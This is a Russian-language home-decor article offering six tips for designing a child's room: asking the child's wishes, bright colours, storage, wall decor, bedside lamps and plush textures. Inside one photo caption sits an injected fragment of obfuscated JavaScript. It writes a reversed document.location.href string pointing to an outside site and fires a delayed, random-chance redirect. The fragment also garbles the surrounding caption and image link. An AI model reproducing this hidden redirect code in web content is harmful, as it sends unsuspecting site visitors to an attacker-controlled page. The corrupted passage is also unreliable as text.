Добавить в закладки

6 нюансов обустройства детской комнаты

Детская комната – пространство, в котором формируется личность ребенка, его характер и эстетический вкус. Оформление жилища должно быть не только удобным, но и красивым.

Детская комната

Детская комната. Фото: myremontnow.ru

6 советов помогут создать стильную и комфортную детскую комнату.

Узнать пожелания ребенка

В основе лучшего дизайна детской комнаты лежат мечты и идеи самого ребенка. Перед ремонтом стоит поинтересоваться его или ее пожеланиями. Дизайнерские идеи малыша помогут определиться с выбором расцветки, декора и конфигурации мебели. В процессе можно проявить креативность и адаптировать мечты ребенка к жизни. Например, юному любителю морских приключений может понравиться кровать в форме корабля; маленькая модница придет в восторг от гламурных подушек с пайетками.

Добавить ярких цветов и принтов

Яркие цвета

Яркие цвета. Фото: labrys.ru

Жизнерадостная палитра – прививка от уныния и противоядие против школьной скуки. Яркая мебель и аксессуары напомнят ребенку, что дом – место, где всегда тепло и радостно.

Красочные орнаменты – лучший способ привнести в комнату яркости. Здесь пригодятся цветные обои, пледы и подушки с принтом, узорчатые шторы. Мотивы рисунков могут быть любыми: от цветов и полосок до персонажей мультфильмов. Окончательный выбор стоит согласовать с самим ребенком.

Цветные обои

Цветные обои. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torage/upload_images/2014-04-24/2869/girl-056jpg_big.jpg»>i0.wp.com

Помнить о системах хранения

Задача шкафов, полок и ящиков – вместить весь ассортимент одежды, книг и игрушек, который будет увеличиваться по мере взросления жильца.

Системы хранения подбирают, учитывая характер и степень аккуратности ребенка. Юным любителям порядка понравятся стеллажи с многочисленными ящиками и отсеками для мелочей. Большие плетеные корзины помогут быстро навести порядок, если ребенок привык раскидывать игрушки.

Мебель

Мебель. Фото: vipflat.ru

Продумать настенный декор

Стенам стоит уделить особое внимание, так как это самое заметное место в комнате. Декор должен не только украшать пространство, но и отражать интересы ребенка.

Возможно, это будет плакат с персонажами любимого мультфильма, удачный рисунок или вышивка. Преимущество настенного декора — мобильность. Надоевший постер можно без труда снять и заменить на более интересные украшения.

Настенный декор

Настенный декор. Фото: ural.org

Установить ночные светильники

Бра над кроватью – функциональный и симпатичный аксессуар. Настенные светильники пригодятся во время вечернего чтения и помогут заснуть, если ребенок боится темноты.

Бра дает мягкий рассеянный свет, который создает умиротворенную атмосферу. Необычный плафон из кружева или цветного стекла добавит обстановке сказочности.

Добавить каплю роскоши

Детям нравятся вещи с мягкими и пушистыми текстурами. Мохнатые аксессуары не только создадут уют, но и позволят комнате выглядеть более дорого. Предметы, которые можно добавить:

  • длинноворсный ковер у кровати;
  • бархатный пуф;
  • плед из толстой шерсти;
  • декоративные подушки из плюша или бархата.

Создать стильную и уютную детскую комнату вполне по силам любому родителю. В основу дизайна стоит положить интересы ребенка и особенности характера. Подходящая обстановка порадует мальчика или девочку, поможет поддерживать порядок в вещах и игрушках.

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Опубликовано: 19.07.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: